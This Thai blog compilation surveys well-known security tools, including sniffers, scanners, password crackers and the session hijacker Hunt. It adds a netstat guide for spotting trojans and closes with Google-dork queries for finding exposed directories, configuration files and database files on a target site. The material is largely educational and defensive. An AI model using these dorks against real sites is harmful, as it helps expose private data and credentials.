Network Analyzer ที่โดยส่วนตัวแล้ว ผมชอบโปรแกรมนี้มากกว่า Tcpdump เพราะมีความสามารถต่างๆ มากกว่า แต่ต้องทำงานแบบเดี่ยวๆ นะครับ เพราะทำงานร่วมกับโปรแกรมอื่นๆ แบบ Tcpdump ไม่ได้ โปรแกรมนี้มีทั้งที่ทำงานบน Unix และ Windows (และระบบปฏิบัติการอื่นๆ อีกมากมาย อาทิ บนเครื่องแมค) โปรแกรมนี้แจกฟรีพร้อมซอร์สโค้ดเช่นเดียวกัน


7) Whisker
โปรแกรม นี้จัดอยู่ในตระล Security Scanner คือสแกนหาจุดอ่อนของเครื่องคอมพิวเตอร์ จุดเด่นคือเขียนด้วยภาษา Perl จึงทำงานได้กับหลายระบบปฏิบัติการ แจกฟรีและมีซอร์สโค้ดให้ด้วยเช่นกัน

Cool Internet Security Scanner
โปรแกรม จากบริษัท ISS ซึ่งเป็นบริษัทที่ทำผลิตภัณฑ์ทางด้าน Security รายใหญ่ โปรแกรมนี้มีความสามารถมาก มีผู้ใช้งานมากมาย และมีราคาแพง (2,795 ดอลลาร์สำหรับ 30 เครื่อง) ผลิตภัณฑ์นี้มีตัวแทนจำหน่ายในประเทศไทย ซึ่งหากยอมเสียเงินก็จะได้รับความสะดวกในการใช้งาน เพราะจะมีการติดตั้ง อบรม และสนับสนุนในด้านต่างๆ ให้เหมาะสำหรับหน่วยงานขนาดใหญ่ที่มีงบประมาณทางด้าน Security เพียงพอ

Internet Security Scanner 
เป็นโปรแกรมที่มีความสามารถมาก มีผู้ใช้งานมากมาย 
และมีตัวแทนจำหน่ายในประเทศไทย

9) Abacus Portsentry
เครื่องมือนี้เป็นเครื่องมือที่แปลกตัวหนึ่ง คือกึ่งโปรแกรม Personal Firewall และ กึ่งโปรแกรมตรวจจับผู้บุกรุก เนื่องจากโปรแกรมนี้จะทำหน้าที่ตรวจจับ การ Scanport และ Block เครื่องที่เข้ามาสแกนพอร์ต ทำให้ไม่สามารถเข้ามา Scan port ได้อีกต่อไป แต่โปรแกรมนี้ไม่ได้ทำหน้าที่บล็อกการสื่อสารต่างๆ เช่นเดียวกับที่ Firewall ทำได้ แถมตรวจจับการบุกรุกด้วยวิธีอื่นไม่ได้ (ตรวจได้แค่การ Scanport เพียงอย่างเดียว)

อย่างไรก็ตามเครื่องมือนี้ จัดว่ามีประโยชน์ หากสามารถนำไปติดตั้งกับเครื่องคอมพิวเตอร์ได้ทุกเครื่อง เพราะแค่ป้องกัน Hacker ทำการ Scanport เพียงอย่างเดียว ระบบก็มีความปลอดภัยมากขึ้นแล้ว ซอฟต์แวร์นี้ปัจจุบันทำงานได้กับระบบปฏิบัติการตระล Unix โดยเน้นไปที่ Linux แต่คาดว่าน่าจะมีเวอร์ชันสำหรับ Windows ในอนาคต โปรแกรมนี้ปัจจุบันยังแจกฟรีอยู่ แต่อนาคตก็ไม่แน่ว่าจะฟรีหรือไม่

10) DSniff
เครื่องมือดักจับแพ็กเกตอีกตัวหนึ่ง นิยมในหมู่ Script kiddies(ไม่ใช่ Hacker) มีหลายโปรแกรมอยู่ในชุดเดียวกัน มีความสามารถในการดักจับกับเครือข่ายที่เป็น Switch ซึ่งโปรแกรมดักจับ Packet ทั่วไปดักจับไม่ได้ โปรแกรมนี้ทำงานได้กับตระล Unix เท่านั้น แน่นอนครับว่าแจกฟรี

(Webmaster: ถ้าเป็นการใช้ Hub เมื่อก่อนก็จะเป็นพวกโปรแกรม Sniffer ดักจับได้ครับ)

11) Tripwire
โปรแกรม ที่ทำหน้าที่ตรวจสอบความถูกต้องของ File และ Directory จุดประสงค์ของโปรแกรมประเภทนี้ คือป้องกันไม่ให้ Hacker นำโปรแกรมประเภทโทรจัน (Trojan) หรือโปรแกรมที่ไม่ได้รับอนุญาตมาปล่อยไว้ในระบบของเรา เพราะโปรแกรมนี้จะคอยตรวจสอบว่ามีผู้นำไฟล์ที่ไม่ผ่านระบบ Tripwire เข้ามาหรือไม่ ถ้ามีก็จะแจ้งเตือนให้ผู้ดูแลระบบตรวจสอบต่อไป โปรแกรมนี้ฟรีสำหรับ Linux แต่เสียเงินสำหรับระบบปฏิบัติการ Windows และโซลาริส (Solaris)

12) Cybercop Scanner
เครื่องมือตรวจหาจุดบกพร่องของคอมพิวเตอร์อีกตัวหนึ่ง ซอฟต์แวร์นี้ ขายในราคาแพง และไม่มีตัวแทนจำหน่ายในประเทศไทย จึงไม่น่าสนใจมากนัก

13) Hping2
โปรแกรม จำพวก Packet Assembly โดยสามารถจะประกอบแพ็กเกตประเภท ICMP, TCP และ UDP แล้วส่งไปยังเครื่องคอมพิวเตอร์เป้าหมายได้โดยไม่ต้องเขียนโปรแกรม ดังนั้นเราสามารถจะใช้โปรแกรม Hping2 นี้เพื่อทดสอบ Firewall สั่ง Scanport และทดสอบระบบเครือข่ายในรูปแบบต่างๆ สามารถส่งได้ทั้งแพ็กเกตแบบปกติ และในแบบที่เป็น Fragment เครื่องมือนี้ยังเหมาะสำหรับผู้ที่ต้องการศึกษาโพรโตคอล TCP/IP อย่างละเอียดด้วย มีใช้งานบนระบบปฏิบัติการตระลยูนิกซ์เท่านั้น แล้วก็ฟรีเช่นเคยครับ

14) SARA
ย่อมาจาก Security Auditor's Research Assistant เป็นเครื่องมืออีกตัวหนึ่งที่พัฒนาขึ้นมาจาก SATAN สำหรับสแกนเพื่อตรวจสอบข้อบกพร่อง โปรแกรมนี้แจกให้ใช้งานฟรี แต่มีเฉพาะบนระบบปฏิบัติการตระล Unix เท่านั้น

15) Sniffit
โปรแกรม ดักจับแพ็กเกต อีกตัวหนึ่ง สามารถดักจับแพ็กเกต TCP/UDP และ ICMP พร้อมทั้งให้รายละเอียดของข้อมูลใน Packet อย่างละเอียด จุดเด่นของโปรแกรมนี้ คือมีรายละเอียดของข้อมูลที่ค่อนข้างมาก สามารถแสดงผลลัพธ์ได้หลายรูปแบบ เหมาะสำหรับผู้ที่ต้องการวิเคราะห์เครือข่ายแบบละเอียด โปรแกรมนี้แจกให้ใช้งานฟรี แต่มีเฉพาะบนระบบปฏิบัติการตระล Unix เท่านั้น

16) SATAN
ย่อ มาจาก Security Auditing Tool for Analyzing Networks ต้นตระลของ โปรแกรมตรวจสอบข้อบกพร่องในคอมพิวเตอร์ และ ถือเป็นตำนานบทหนึ่งของวงการ Security เนื่องจากเป็นเครื่องมือที่ออกมาก่อนใคร มีการทำงานที่เก่งกาจ (ในสมัยนั้น) จึงเป็นเครื่องมือที่มีผู้ใช้งานมาก ปัจจุบันมีหลายโปรแกรมที่พัฒนามาจาก SATAN และหลายโปรแกรมทำได้ดีกว่า แถมยังมีซอฟต์แวร์เชิงพาณิชย์ที่มีความสามารถหลากหลายกว่า ทำให้ SATAN ไม่เป็นที่นิยมเหมือนในอดีต โปรแกรมนี้แจกให้ใช้งานฟรี แต่มีเฉพาะบนระบบปฏิบัติการตระล Unix เท่านั้น


17) IPFilter
Firewall ที่ทำงานบนระบบปฏิบัติการ ตระล Unix ในลักษณะแบบ Packet Filtering (ยังไม่สามารถทำงานแบบ Statefule Inspection ได้) Firewall นี้หากจะเทียบกับFirewall ที่เป็นซอฟต์แวร์เชิงพาณิชย ์คงเทียบไม่ได้ แต่ข้อดีของ Firewall ตัวนี้ คือฟรีพร้อมทั้ง Sourcecode ด้วย

18) iptables/netfilter/ipchains/ipfwadm
โปรแกรม Firewall อีกตัวหนึ่งที่ทำงานบนระบบปฏิบัติการตระล Unix การทำงานของ Firewall นี้เป็นเพียงแบบ Packet Filtering เท่านั้น ไม่สามารถทำงานแบบ Statefule Inspection ได้ Firewall นี้แจกฟรีพร้อมทั้ง Sourcecode เช่นเดียวกัน

19) Firewalk
เป็น เครื่องมือช่วยใน การวิเคราะห์เครือข่าย โดยจะมีการทำงานคล้ายกับโปรแกรม Traceroute โดยวิเคราะห์แพ็กเกตที่ตอบสนองจาก Router เพื่อตรวจสอบรูปแบบของเครือข่าย และตรวจสอบการกรองข้อมูลของ Router โปรแกรมนี้แจกให้ใช้งานฟรี แต่มีเฉพาะบนระบบปฏิบัติการตระล Unix เท่านั้น

20) Strobe
โปรแกรมประเภทสแกนพอร์ต (Port Scanner) ซึ่งแม้ว่าจะไม่มีความสามารถขนาดโปรแกรม NMAP แต่ก็มีการทำงานที่รวดเร็ว

21) L0pht Crack 
โปรแกรมนี้เป็นโปรแกรมแคร็ก (Crack) รหัสผ่านบนระบบ Windows โดยโปรแกรมนี้ออกแบบมาเพื่อแก้ปัญหาในเรื่องของผู้ใช้ที่ชอบตั้งรหัสผ่านให้เดาง่าย โดยโปรแกรมนี้จะทำการเดารหัสผ่านผู้ใช้ เพื่อหาว่าผู้ใช้คนใดตั้งรหัสผ่านเอาไว้ง่ายเกินไป หรือเอาไว้หารหัสผ่านของผู้ใช้ที่ลืมรหัสผ่าน ดังนั้นโปรแกรมนี้จึงมีประโยชน์มาก อย่างไรก็ตามโปรแกรมนี้ไม่ฟรี โดยมีราคา 350 ดอลลาร์ แต่มีเวอร์ชันให้ทดลองใช้ก่อน

<...John the Ripper โปรแกรมแคร็กพาสเวิร์ดอันโด่งดัง คุณสามารถดาวน์โหลดได้ที่ www.openwall.com/john/...>

22) John the Ripper โปรแกรมนี้จัดได้ว่าเป็นโปรแกรม Crack รหัสผ่านที่โด่งดังมากที่ สุดในวงการ โปรแกรมนี้ สามารถทำงานบนระบบปฏิบัติการส่วนใหญ่ได้ การทำงานจัดว่าเร็วมาก แถมยังแจกซอร์สโค้ดด้วย โปรแกรมแบบนี้ไม่ได้ใช้ในทางร้ายอย่างเดียวนะครับ เพราะคุณสามารถนำไปตรวจสอบกับผู้ใช้ของคุณ ว่าตั้งรหัสผ่านให้เดาได้ง่ายหรือไม่ แถมแจกฟรีอีกด้วย

23) Hunt 
โปรแกรมนี้จัดว่าเป็นอันตรายอย่างมาก เพราะโปรแกรมนี้สร้างขึ้นเพื่อการขโมย Session หรือที่เรียกเป็นภาษาอังกฤษว่า Session Hijacking โดยโปรแกรมนี้จะทำทุกอย่างโดยอัตโนมัติ จนทำให้เทคนิคการขโมย Session ที่ยุ่งยาก กลายเป็นสิ่งที่ทุกคนทำได้ไปเลย โปรแกรมนี้สามารถขโมย Session ได้ทั้งบน Hub และ Switch (อย่าคิดว่าใช้ Switchแล้วปลอดภัย 100 เปอร์เซ็นต์นะครับ) สำหรับการป้องกันแฮกเกอร์ทำการขโมย Session ที่สมบูรณ์นั้น ก็ต้องใช้วิธีการเข้ารหัส สำหรับโปรแกรม Hunt เป็นของฟรีครับ แถม Sourcecode มาให้อีกต่างหาก

24) OpenSSH 
เครื่องมือนี้ใช้ในการสร้างช่องทางสื่อสารที่มีการเข้ารหัส ซึ่งจะทำให้ข้อมูลที่สื่อสารในเครือข่ายมีความปลอดภัยต่อการดัก จับข้อมูล โปรแกรมนี้ทำงานบนระบบปฏิบัติการตระลยูนิกซ์ โดยมักใช้กับโปรแกรม Telnet หรือ FTP แต่เครื่องมือนี้ก็เปิดโอกาสให้ผู้ใช้นำไปรักษาความปลอดภัยให้ช่องทางสื่อสารอื่นๆ ได้ด้วย

25) TCP Wrapper 
เครื่องมือนี้ทำงานบนระบบปฏิบัติการ Unix เช่นเดียวกัน โดยโปรแกรมนี้จะทำหน้าที่เก็บข้อมูลการติดต่อมายัง Server ผ่านโปรแกรมต่างๆ เช่น Telnet, FTP นอกจากนั้นยังสามารถกรอง (Filter) การเข้าใช้ ให้สามารถเข้าใจจากเครื่องที่กำหนดไว้เท่านั้นก็ได้ นับเป็นเครื่องมือหนึ่งที่มีการใช้งานกันมาก

26) NTop 
เป็นโปรแกรมแสดงข้อมูลการใช้งานเครือข่ายบนจอภาพ โดยสามารถ แสดงสถิติการใช้งานได้หลายแบบ สามารถแยกตามเครื่องได้ นอกจากนั้นยังสามารถเรียกดูผ่านเว็บได้อีกด้วย

27) Traceroute / Ping /Telnet 
อันที่จริง 3 โปรแกรมนี้ก็เป็นเครื่องมือใช้งานทั่วๆ ไป และสามารถใช้งานได้กับเครื่องคอมพิวเตอร์ทั่วๆ ไป แต่เนื่องจากมีการใช้งานมาก จึงได้รับการจัดอันดับด้วย สำหรับโปรแกรม Traceroute นั้นในวินโดวส์ใช้ชื่อว่า Tracert

28) NAT (NetBIOS Auditing Tools) 
โปรแกรมนี้มีหน้าที่ตรวจสอบเครื่องคอมพิวเตอร์ในเครือข่าย โดยจะตรวจสอบเฉพาะเครื่องที่รันระบบปฏิบัติการ Windows ว่ามีเครื่องใดมีการ Share Folder เอาไว้บ้าง และตรวจสอบต่ออีกว่าในการแชร์นั้นได้กำหนดสิทธิในการเข้าถึงที่ มีความปลอดภัยเพียงพอหรือไม่ เพราะผู้ใช้ส่วนใหญ่มักจะมีการแชร์แบบเต็มที่ (Full Share) ซึ่งอาจทำให้เป็นช่องทางในการโจมตีของแฮ็กเกอร์ได้

29) Scanlogd 
เป็นโปรแกรมที่ทำงานในระบบปฏิบัติการ Unix โดยทำหน้าที่ตรวจสอบการถูก  Hacker (แฮกเกอร์) ทำการ Scan port แต่เนื่องจากโปรแกรมนี้ค่อนข้างเก่า และมีโปรแกรมอื่นที่มีความสามารถมากกว่า จึงไม่เป็นที่นิยมมากนัก

30) Sam Spade
เป็นโปรแกรมสำหรับตรวจสอบ IP Address เพื่อหาคนที่ปลอมหมายเลข IP

31) NFR 
เป็นโปรแกรมตรวจจับผู้บุกรุกที่มีชื่อเสียงพอควร มีทั้งส่วนที่ตรวจจับ Hacker - แฮกเกอร์ ผู้บุกรุกทางเครือข่าย และตรวจจับผู้บุกรุกในเครื่องคอมพิวเตอร์

32) Logcheck 
เป็นโปรแกรมที่ทำหน้าที่ ตรวจจับ การเปลี่ยนแปลงของไฟล์ Log ทั้งนี้เนื่องจากพฤติกรรมอย่างหนึ่งของแฮ็กเกอร์หลังจากที่เข้า สู่ระบบแล้ว มักจะมีการลบร่องรอยของตนเองที่บันทึกไว้ใน Log ซึ่งโปรแกรมนี้จะช่วยให้ตรวจสอบได้ ว่ามีการเปลี่ยนแปลงเกิดขึ้น ซึ่งอาจเกิดจากแฮ็กเกอร์ก็ได้

33)  Perl 
เป็นภาษาสคริปต์อเนกประสงค์ ส่วนใหญ่เรามักรู้จักว่าเป็นภาษาหนึ่งที่ใช้เขียนเว็บได้ แต่อันที่จริง Perl เป็นภาษาที่ใช้ได้หลายอย่าง ซึ่งผู้ดูแลระบบที่เก่งๆ ก็มักจะเขียนสคริปต์เก่งอีกด้วย

<...Perl มุกมณีซ่อนเร้นที่มีความสามารถทางด้านสคริปต์มากมาย หาข้อมูลเพิ่มเติมได้ที่ www.perl.org...>

34) Ngrep 
ใช้ตรวจจับเพื่อหาข้อมูลที่ต้องการที่วิ่งผ่านเครือข่าย คล้ายกับการหาข้อความในฮาร์ดดิสก์ แต่นี่เป็นการหาในเครือข่าย เช่น จะหาคำว่า password โปรแกรมนี้ก็จะดักจับเฉพาะแพ็กเกจที่มีคำว่า password มาให้ ทำให้โปรแกรมนี้สามารถนำไปใช้งานได้ทั้งการป้องกันและการโจมตี

35)  Cheops__ 
เครื่องมือนี้ทำหน้าที่เป็นส่วนติดต่อกับผู้ใช้ให้กับโปรแกรมต่างๆ ที่ต้องการแสดงผลในรูปแบบของผังเครือข่าย ขณะนี้ผู้พัฒนากำลังหาอาสาสมัครรับช่วงดูแลโปรแกรมนี้ต่อ ใครสนใจก็ติดต่อได้นะครับ

36) Vetescan 
เป็นโปรแกรมที่ทำหน้าที่สแกนหาจุดอ่อนในเครื่องคอมพิวเตอร์ โดยสามารถสแกนได้ทั้งคอมพิวเตอร์ตระลยูนิกซ์และตระล Windows

37) Retina 
เป็นโปรแกรมตรวจหาจุดอ่อนในเครื่องคอมพิวเตอร์อีกโปรแกรมหนึ่ง ที่มีชื่อเสียง แต่โปรแกรมนี้เป็นโปรแกรมเชิงพาณิชย์ ดังนั้นหากใครจะใช้ก็ต้องเสียเงินครับ

38) Libnet 
เป็นเครื่องมือในลักษณะของ API คือจะต้องเขียนโปรแกรมเพื่อเรียกใช้อีกทีหนึ่ง โดย Libnet จะทำให้เราสามารถเขียนโปรแกรม เพื่อสร้างแพ็กเกตส่งไปในเครือข่ายได้ง่ายขึ้น โดยข้อดีของแพ็กเกจที่สร้างโดย Libnet คือเป็นการสร้างที่ระดับต่ำ (Low-level Packet) ดังนั้นเราสามารถสร้างแพ็กเกจอะไรก็ได้ ได้ทั้งแพ็กเกจปกติและไม่ปกติ ทำให้สามารถนำไปสร้างแพ็กเกจที่ทดสอบและโจมตีได้

39) Crack / Cracklib 
เป็นโปรแกรมแคร็กรหัสผ่านอีกตัวหนึ่ง เป็นที่นิยมพอควร แต่ทำงานได้กับระบบปฎิบัติการตระล Unix เท่านั้น

40) Cerberus Internet Scanner 
เป็นโปรแกรมที่ทำหน้าที่ตรวจสอบหาจุดบกพร่องของคอมพิวเตอร์ผ่า นทางเครือข่าย โดยโปรแกรมนี้ทำงานบนระบบปฏิบัติการ Windows NT หรือ Windows 2000 โปรแกรมนี้แจกฟรีอีกเช่นกัน

41) OpenBSD 
เป็นระบบปฏิบัติการตระล Unix (ไม่ใช่ Linux) โดยเป็นระบบปฏิบัติการที่ได้ชื่อว่าปลอดภัยมากที่สุดตัวหนึ่ง เพราะความปลอดภัยเป็นเป้าหมายหลักของผู้สร้างอยู่แล้ว ดังนั้นหากต้องการระบบปฏิบัติการที่สามารถวางใจได้ ระบบปฏิบัติการนี้คงไม่ทำให้ผิดหวัง ข้อเสียของระบบปฏิบัติการนี้ คือใช้งานยากกว่า Linux และหาเอกสารคู่มือการใช้งานอ่านได้ยากกว่า

42) Nemesis 
เป็นเครื่องมือที่ใช้ในการสร้างแพ็กเกต โดยเรียกใช้จาก Shell Script บนระบบ Unix

43) LSOF 
ย่อมาจาก List Open Files โดยเป็นเครื่องมือบน Unix เพื่อแสดงไฟล์ที่เปิดใช้งานอยู่

44) Lids 
เป็นโปรแกรมป้องกันการบุกรุก(Hacker) เฉพาะส่วนเคอร์เนลของ Linux ทั้งนี้เพื่อป้องกันไม่ให้มีการใช้งานเป็นผู้ดูแลระบบ แต่หากผู้ดูแลระบบตัวจริงต้องการเข้าใช้งาน ก็จะต้องยกเลิกการทำงานของ Lids เสียก่อน

45) IPTraf 
เป็นโปรแกรมดักจับแพ็กเกจและแสดงผลที่จอภาพ สามารถแสดงการใช้งาน แสดงโพรโตคอลต่างๆ ได้

46) IPLog 
เป็นโปรแกรมที่คอยตรวจสอบการสแกนและการโจมตีของ Hacker , แฮกเกอร์
ผ่านเครือข่าย

47) Fragrouter 
โปรแกรมสร้างแพ็กเกต เพื่อตรวจสอบการทำงานของโปรแกรมตรวจจับการบุกรุก (IDS)

48) Queso
 เป็นโปรแกรมที่ทำการตรวจสอบระบบปฏิบัติการของเครื่องเป้าหมาย โดยวิธี Stack Fingerprint ซึ่งปัจจุบันมักใช้โปรแกรม NMAP มากกว่าเพราะทำงานได้ครอบคลุมกว่า

49) GPG/PGP 
โปรแกรมสำหรับเข้ารหัสและตรวจสอบข้อมูล โดยเลียนแบบการทำงานมาจากโปรแกรม PGP แต่แจกฟรี

ผม หวังว่าคงจะเป็นประโยชน์ เพราะอย่างน้อยก็จะได้ทราบว่าเขามีการใช้เครื่องมืออะไรกันบ้าง และโปรแกรมส่วนใหญ่ก็เป็นโปรแกรมที่แจกฟรี หลายๆ คนที่ไม่มีงบประมาณจะได้ทดลองนำมาใช้งานกับระบบของตัวเอง ก็หวังว่าจะได้ประโยชน์กันตามสมควรจากบทความนี้ แม้ว่าหลังๆ จะเขียนแบบย่อๆ เพระผมเห็นว่าเครื่องมือเหล่านี้ ไม่นิยมใช้มากเหมือนกับในครึ่งแรก สำหรับหลักการทำงานของโปรแกรมประเภทต่างๆ

เท่า ที่แนะนำมาก็คงจะพอเห็นภาพแล้วนะครับว่า เครื่องมือทางด้าน Security นี่ต้องบอกว่าเกิดจาก Unix เป็นส่วนใหญ่จริงๆ โดยเฉพาะเครื่องมือในชุดนี้ ล้วนแล้วแต่ทำงานใน Unix เป็นส่วนใหญ่ ทั้งนี้เนื่องจากเขาไปสำรวจจากคนที่ใช้ Unix ก็คงต้องได้ผลลัพธ์แบบนี้แหละครับ แต่ที่ผมนำมาแนะนำก็เพราะเห็นว่าส่วนใหญ่เป็นของฟรีที่ไม่ต้องเสียเงิน

แต่ ถึงแม้ว่าเครื่องมือด้าน Security มักจะอยู่บน Unix แต่ขณะนี้มีแนวโน้มอย่างมากที่เครื่องมือเหล่านี้ จะพอร์ตขึ้นมาทำงานบน Windows ดังจะเห็นได้จากซอฟต์แวร์ที่นิยมเป็นอันดับแรกๆ หลายโปรแกรมก็มีให้ใช้งานบน Windows แล้ว ดังนั้นในอนาคตซอฟต์แวร์พวกนี้ก็จะย้ายมาอยู่บน Windows มากขึ้น แต่หากใครใจร้อนไม่อยากรอ และไม่เคยใช้ Unix มาก่อน ก็ขอบอกว่าทดลองใช้เถิดครับ เพราะ Unix อย่าง Linux ปัจจุบันมีการใช้งานที่ง่ายมากขึ้นเรื่อยๆ อย่าง Redhat นี่ก็ง่ายมาก ตั้งแต่การติดตั้งที่เป็นอัตโนมัติไม่แพ้การติดตั้ง Windows เลย ปัญหาเรื่องไดรเวอร์ก็ไม่มีอีกต่อไปแล้ว การใช้งานก็เป็นกราฟิกที่หน้าตาคล้ายๆ กับวินโดวส์ ผมเชื่อว่าลองใช้สัก 1-2 สัปดาห์ ก็น่าจะใช้งานได้คล่องเพียงพอที่จะใช้เครื่องมือเหล่านี้แล้ว

(Webmaster: หรือถ้าจะลองเล่นระบบ Linux ก็ทดลองติดตั้งพวก CentOS หรือ Ubuntu ก็ได้ครับ เพราะ Redhat นี้เสียตังค์แล้ว หรือพวก BSD ก็แนะนำให้เล่น FreeBSD ครับ)


[[ CREDIT ]]
อาจารย์ธนา หงษ์สุวรรณ 
อาจารย์ประจำภาควิชาวิศวกรรมคอมพิวเตอร์
สถาบันเทคโนโลยีพระจอมเกล้าเจ้าคุณทหารลาดกระบัง
ที่มา : http://www.sysnetcenter.com/board/index.php?topic=214.0
Read more

+ Hack tools Online +

Enjoy :)

www.pentest-tools.com

Reconnaissance
Google Hacking
Find Subdomains
Find VHosts
DNS Zone Transfer
DNS Lookup
Whois Lookup

Scanning&Enumeration
Ping sweep
TCP port scan
UDP port scan
Web app discovery
URL Fuzzer
XSS Server

Vulnerability scanning
Web Server Scan
CMS Version Scan
SSL Heartbleed
Password Cracking
Password Cracker
Read more

พื้นฐานแฮกเกอร์ ตอน ตรวจสอบแฮกเกอร์และโทรจัน

พื้นฐานการป้องกันตัวของแฮกเกอร์ - ฉบับ basic-hack

สำหรับแฮกเกอร์มือใหม่ที่ไม่รู้จัก CMD หรือ (Command Prompt) - CMD บน Windows นั้น..ไม่ใช่ระบบปฏิบัติการ DOS ในยุคเก่าแก่แต่อย่างใด แต่เป็นการจำลองระบบปฏิบัติการ DOS ไว้ในเครื่องเรา เพื่อการใช้งานแบบ Command Line หรือใช้งานคำสั่งแบบบรรทัดเดียว....เพื่อสามารถเข้าถึงการทำงานในระดับลึกๆของระบบปฏิบัติการที่เราใช้นั่นเอง....

การตรวจสอบด้วยคำสั่ง NETSTAT สามารถเช็คหา IP ที่เชื่อมต่อเข้ามาในเครื่อง
หมายความว่า สามารถเช็คได้ในระยะที่คุณกำลัง "โดนแฮก" หรือเผลอไปคลิกไฟล์โทรจัน ลฯล
หรือจะนำไปใช้ตรวจสอบแบบ Real Time และสังเกตุเพื่อระวังภัยได้ทุกวินาที

วิธีเรียกใช้ CMD ใน Windows
กดปุ่ม Window + R เพื่อเรียก Run  > พิมพ์ cmd  > ENTER
########################################################################
คำสั่ง netstat
ใช้เช็คการเชื่อมต่อต่างๆระหว่างเรากับเครื่องอื่น เลือกใช้ได้ทั้ง netstat -a หรือ netstat -n ตามต้องการ
แต่เราจะใช้คำสั่ง netstat -ano 5  คือ การเช็คทุกๆ 5วินาที และแสดง Process ID ด้วย

เช็คแบบเจาะจง STATE ทุกๆ5วินาที
netstat -ano 5 |find /i "established"
netstat -ano 5 |find /i "listening"

########################################################################



การตรวจสอบ IP และ Port ที่น่าสงสัย

Local Address คือ IP ฝั่งเรา และ PORT ที่ใช้งานให้สังเกตุหมายเลขพอร์ตแปลกๆที่เปิด
Foreign Address   คือ IP ที่เข้ามาติดต่อรับส่งข้อมูลกับเครื่องเรา(อาจเป็นไอพีของแฮกเกอร์)
PID  คือ หมายเลข Process ID

ในแถบ STATE หรือสถานะการติดต่อหลักๆที่เรามักจะเห็น
ESTABLISHED   คือ สถานะที่กำลังติดต่อ รับหรือส่ง ข้อมูลกับเรา
..แต่ไม่ได้หมายความว่า จะมี "แฮกเกอร์แฮกเข้ามาในเครื่องเราซะเสมอไป
....อาจเป็นได้ทั้ง IP เว็บที่คุณกำลังเปิด , โปรแกรมที่กำลังรันอยู่บนเครื่อง ลฯล
LISTENING   คือ สถานะรอการติดต่อ
หลักๆแล้วเราจะเจอแค่ 2 สถานะนี้  เพิ่มเติมสามารถอ่านได้ที่ท้ายบทความครับ

ปล.ตอนทดสอบให้เราปิดเบราเซอร์ , เกมส์ , โปรแกรม ลฯล ที่ใช้การติดต่อทางอินเตอร์เน็ต
ออกทั้งหมดแล้ว จะเห็น IP ที่น่าสงสัยง่ายขึ้น

########################################################################

ถึงขั้น..ตามถอนรากถอนโคน

โดยการนำ PID ของการเชื่อมต่อที่น่าสงสัยไปเช็คใน Task Manager  
กด CTRL+ALT+DELETE เปิด Task Manager ขึ้นมา ....ในแถบ Processes หา PID ที่สงสัย และเราจะได้ไฟล์ที่มาของการเชื่อมต่อ...หลังจากนั้นลองคลิกขวาเลือก Properties เพื่อดูที่อยู่ไฟล์ 
หรือทำการ End Procress ทิ้งไปก่อนถ้ามั่นใจว่าเป็นไฟล์อันตราย

Window + R เพื่อเรียก Run  > regedit > Enter 
และไปที่ edit > find > ใส่ชื่อไฟล์ที่เราสงสัย
เมื่อเจอและมั่นใจว่ามันคือ โทรจัน หรือ Backdoor ให้ลบทิ้ง 
และอย่าลืมตามไปเซิสหาเพื่อลบในไดว์ C:/ D:/
รวมทั้งเช็ค Window Start up โดยการไปที่ Start > Run > Msconfig ในแถบ Startup


########################################################################
แหล่งข้อมูลเพิ่มเติมเรื่อง TCP STATE
- TCP Connection States and Netstat Output - http://support.microsoft.com/kb/137984 
- STATE ต่างๆของคำสั่ง netstat  - http://www.thaiadmin.org/board/index.php?topic=16686.0
########################################################################
บทความ - ak1 -www basic-hack.blogspot - ดอทคอม
########################################################################

Read more

พื้นฐานแฮกเกอร์ - ตอน แฮกเว็บด้วยGoogle &[Online Pentest Tools]

แฮกเกอร์ แฮกเว็บยังไง ใช้อะไรแฮกเว็บ ถ้าอยากเริ่มต้นกับ แฮกเกอร์ หรือนักทดสอบความปลอดภัยของระบบ

แฮกเว็บ
credit photo webmonkey.com

ขั้นตอนแรกที่ แฮกเกอร์ สำรวจหากต้องการ แฮกเว็บไซต์นั้นๆ นั่นคือการใช้ Google ค้นหาข้อมูลของเว็บไซต์ 

และสามารถประยุกค์ใช้ในการหาแหล่งความรู้ ตามเรื่องที่ต้องการ เช่น สามารถใช้ Google เข้ามาช่วยในการค้นหาไฟล์เอกสาร หรือหน้าไดเรกทอรี่สำคัญที่แฮกเกอร์ สามารถเข้าถึงได้ อาธิเช่น แหล่งเก็บไฟล์เอกสารต่างๆ ...บางครั้งเราอาจพบข้อมูลที่เป็นประโยชน์ต่อการโจมตีของ แฮกเกอร์ เช่น กรณีแอดมินที่เก็บข้อมูลอะไรซักอย่างลงไฟล์ .txt หรือเอกสารอื่นๆ ที่ Google Bot  สามารถเข้าถึงได้จนถูกเจ้า Google Bot เก็บนำมาจัดลำดับแสดงผลบนเว็บ Google และยิ่งฝั่งแอดมินไม่มีการ Set Permission ,หรือป้องกันการเข้าชมจากบุคคลภายนอกด้วย จึงทำให้เป็นที่มาของการเขียนบทความนี้ เพราะเป็นวิธีที่ง่ายและไม่ต้องลงมือสแกนเว็บ หรือติดต่อกับเว็บไซต์เป้าหมายโดยตรง และอาจมีโอกาสเจอข้อมูลสำคัญๆได้

ปล.ส่วนใหญ่แฮกเกอร์หมวกดำ อาจจะใช้เพื่อกวาดเป้าหมายบน Google เสียมากกว่า
ในทางตรงกันข้ามของแฮกเกอร์ที่ฉลาด และอยากเข้าใจในการทำงานของระบบต่างๆ
ต้องการหาความรู้เพิ่มมักใช้คำสั่งเหล่านี้ในการหาแหล่งข้อมูลลับๆ ได้อย่างง่ายดาย

คำสั่งพื้นฐาน [สำคัญ]

ขั้นแรกแฮกเกอร์ล็อคเป้าหมายด้วยการใช้คำสั่ง
site:เป้าหมาย.com
คือการหาแบบเจาะจงเว็บ   เช่น  site:basic-hack.blogspot.com 

ซึ่งนิยมใช้ควบคู่กับคำสั่งด้านล่างต่อไปนี้

intitle:             หาตาม TITLE (ส่วนชื่อเรื่อง)
intext:             หาหน้าที่มีคำนี้  
inurl:               หา URLหรือลิงค์ของเว็บ เช่น inurl:webboard/admin.php
filetype:txt       หาไฟล์นามกสุล TXT     
ext:ini              หาไฟล์นามสกุล INI

อื่นๆ ลองประยุคใช้กันดูครับ
###############################################################
ค้นหาหน้า index.of หรือไดเรกทอรี่ที่เปิดไว้
site:target+intitle:index.of
###############################################################
ค้นหาไฟล์ที่เกี่ยวกับการตั้งค่าต่างๆ  (configuration files)
site:target+ext:xml+|+ext:conf+|+ext:cnf+|+ext:reg+|+ext:inf+|+ext:rdp+|+ext:cfg+|+ext:txt+|+ext:ora+|+ext:ini
###############################################################
ค้นหาไฟล์ที่เกี่ยวกับ database
site:target+ext:sql+|+ext:dbf+|+ext:mdb
###############################################################
